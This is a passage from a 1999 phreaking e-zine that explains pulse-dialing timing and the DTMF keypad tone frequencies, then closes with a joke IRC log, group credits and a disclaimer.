The old method used on some of the older phones and networks for dialing
was rotary dialing also known as pulse dialing which sends a number of
electrical pulses down the telephone line equal to the number dialed. So
if the number 3 was dialed the connection between your phone set and the
central office would open and close 3 times. For some messed up reason
some people seem to get the idea that if they tap out the numbers on the
switch hook of their DTMF phone they get free calls because they didn't
actually dial any numbers but all they are doing is pulse dialing.
To keep the network from interpreting the opening/closing of the dial
pulse as being a depressed switch hook, specific timing restrictions are
placed on pulses and valid switch hook flashes. A rotary phone generates up
to 10 pulses per second, with each pulse around 1/20th of a second in
duration and around 1/20th of a second time delay between pulses. The
network also expects around a 7/10th of a second delay between the different
digits dialed.
A valid flashing of the switch hook must see the connection open for a
specific period of time known as a hook flash.

The method above was quite slow and time consuming and so a new method
of dialing using tones instead of pulses was developed. As you all know
DTMF dialing uses a keypad with 12 buttons for input. Each row and column
of the keypad corresponds to a certain tone and creates a specific
frequency. Each button lies at the intersection of two tones. When the
button is pressed, the two tones are generated by the telephone set and
sent over the local loop connection to the central office, which can read
the different tones and understand which number out of the millions in the
world you are trying to connect to.

The DTMF dialing pad:


1209hz 1336hz 1477hz

697hz 1 2 3

770hz 4 5 6

852hz 7 8 9

941hz * 0 #


2 = 697hz + 1336hz

For example pressing the number 2, simultaneously generates both an 697hz and 1336hz
tone. These tones are sent over the local loop and received by the central
office switching equipment. Since multiple frequency's are available
and pressing a key generates a specific dual tone combination this type
of dialing is known as dual tone multiple frequency (DTMF) dialing.

Anyway thats the basics of it, later .....


-->[OO]::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
-->[OO]::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
-->[OO]:::::::::::::::[ Outness ]::::::::::::::::::::::::::::::::::::::::::::
-->[OO]::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
-->[OO]::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::

[22:33] <[cyborg]> z0mna: you are so cool
[22:34] <[cyborg]> really you are!
<z0mba> i know dood
[22:34] <[cyborg]> you r0ck
<z0mba> i know
[22:34] <ginger> hehe
[22:34] <[cyborg]> no really, you 0wn the most dood
[22:34] <ginger> u do!
[22:35] * [cyborg] sings the U2 song 'the sweetest thing' as a tribute to
z0mba
[22:35] <[cyborg]> oho.. the leetest thing
[22:35] <[cyborg]> z0mba is the leetest thing
<z0mba> i know goddamnit
[22:35] <ginger> lol
[22:35] *** [cyborg] was kicked by z0mba ( take your lips off my ass )


Well there it is, a quality issue of f41th composed by yours truly, just
remember who provided you will all this mad o-day inph0z, it was and always
will be the men, women and children of D4RKCYDE [darkcyde.phunc.com].
P34C3 Y'4LL.
-----------------------------------------------------------------------------

[ http://darkcyde.phunc.com ] main darkcyde site.
[ http://attrition.org ] f41th mirror.
[ http://hybrid.dtmf.org ] hybrid's phone security site.
[ http://epidemik.org ] fear the epidemik.
[ O11 +44 (O)19O4 783 489 ] official BBS distro for D4RKCYDE. 24/7.

Notice:

f41th is a production of D4RKCYDE [c] 1999. All information provided in this
zine is purely for entertainment purposes only, we may skool you, but we
don't encourage you. To submit an article to f41th, send to hybrid@dtmf.org
or cometo #darkcyde on efnet. If you wish to mirror f41th magazine, please
email any of the D4RKCYDE members before hand. Thankyou for reading this
notice.

______ ______ _ _ _______ __ __ ______ _______
| \ |_____/ |____/ | \_/ | \ |______
|_____/ | \_ | \_ |_____ | |_____/ |______

[ #darkcyde EFNET - http://darkcyde.phunc.com ]

" ... find us on the pstn b1tch ... "

+++
NO CARRIER










← previous
next →
2
6 Jun 2022
Really enjoyed this post.Really thank you! Keep writing. makaberzux
8 Jun 2022
Really enjoyed this post.Really thank you! Keep writing. makaberzux
sending ...
This website uses cookies to store your preferences and improve the service. Cookies authorization will allow me and / or my partners to process personal data such as browsing behaviour.

By pressing OK you accept the Terms of Service and Privacy Policy

By pressing REJECT you will be able to continue to use Neperos (like read articles or write comments) but some important cookies will not be set. This may affect certain features and functions of the platform.
OKREJECT